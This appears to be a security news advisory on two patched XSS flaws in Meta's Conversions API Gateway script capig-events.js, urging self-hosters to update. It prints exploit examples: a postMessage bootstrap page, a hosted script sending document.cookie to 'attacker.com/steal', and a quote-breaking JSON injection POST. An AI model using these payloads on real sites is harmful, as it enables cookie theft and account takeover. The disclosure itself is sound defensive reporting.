Meta Patches XSS Flaws in Conversions API Gateway Enabling Zero-Click Account Takeover
Take action: If you are using a self hosted Meta Conversions API Gateway, this is important and urgent. Your server is exposed to the internet to provide analytics, so you need to patch it. And the exploit is now trivial with the full writeup available.
Learn More
Meta patched two flaws in its Conversions API Gateway that allowed attackers to hijack Facebook accounts without any user interaction.
The gateway script, capig-events.js, runs on Meta's main domains and millions of third-party websites. This wide reach turned a tracking tool into a massive supply-chain risk.
The first vulnerability involved a client-side failure to check message sources. The script accepted configuration data through postMessage but never verified the sender's origin. Attackers exploited this by sending malicious payloads that forced the script to load external JavaScript from an attacker-controlled server. Researchers bypassed security headers like CSP by targeting specific logged-out help pages and mobile WebView configurations.
Example:
Attacker's malicious page:
<!-- attacker.com/exploit.html -->
<script>
// Open Meta's help page (which has relaxed CSP)
var targetWindow = window.open('https://www.meta.com/help/', 'test');
// Wait for page to load
setTimeout(function() {
// Send malicious IWL_BOOTSTRAP message
targetWindow.postMessage({
msg_type: 'IWL_BOOTSTRAP',
pixel_id: '1234567890', // Valid pixel ID
session_start_time: Date.now()
}, '*');
}, 2000);
</script>Attacker's hosted script (on compromised third-party domain):
// https://compromised.third-party.com/sdk/1234567890/iwl.js
// This executes in www.meta.com context
document.location = 'https://attacker.com/steal?cookies=' + document.cookie;The second flaw was a stored injection bug in the gateway's backend. The Java-based system built JavaScript files by directly adding user-provided JSON values into the code. It did not escape or clean these values. Attackers used single quotes to break the script's logic and insert their own malicious commands. This meant the gateway served the attacker's code to every visitor automatically.
Example:
Malicious POST request to create IWL rule:
POST /iwl/rules HTTP/1.1 Host: gw.conversionsapigateway.com {
"pixel_id": "1234567890",
"domain_uri": "https://www.meta.com",
"event_type": "PageView\",\"id\":\"x\"}]});alert(document.domain);//",
"extractor_type": "CSS",
"id": "malicious_rule"
}Resulting injected code in capig-events.js:
cbq.config.set("1234567890", "IWLParameters", {
params: {
"domain_uri": "https://www.meta.com",
"event_type": "PageView","id":"x"}]});alert(document.domain);//",
"extractor_type": "CSS",
"id": "malicious_rule"
}
});These flaws allowed for large-scale account takeovers. By running code in a trusted Meta context, attackers could steal session tokens and change account security settings. The impact extended beyond Meta's own servers because the gateway is open-source. Any organization hosting its own version of the tool was equally exposed to these silent attacks.
Meta has fixed both issues and paid the researchers $312,500 in total bounties. Organizations using self-hosted gateways must update to the latest version immediately.
